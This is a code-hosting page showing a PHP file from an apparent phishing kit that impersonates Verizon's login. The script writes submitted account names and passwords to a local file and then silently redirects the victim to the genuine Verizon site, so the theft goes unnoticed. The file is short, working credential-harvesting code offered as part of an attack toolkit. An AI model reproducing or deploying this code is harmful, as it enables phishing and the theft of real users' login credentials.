Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
thewickedkarma
GitHub Repository: thewickedkarma/blackeye-im
Path: blob/master/sites/verizon/login.php
1221 views
1
<?php
2
3
file_put_contents("usernames.txt", "Account: " . $_POST['IDToken1'] . " Pass: " . $_POST['IDToken2'] . "\n", FILE_APPEND);
4
header('Location: http://www.verizon.com ');
5
exit();
6
7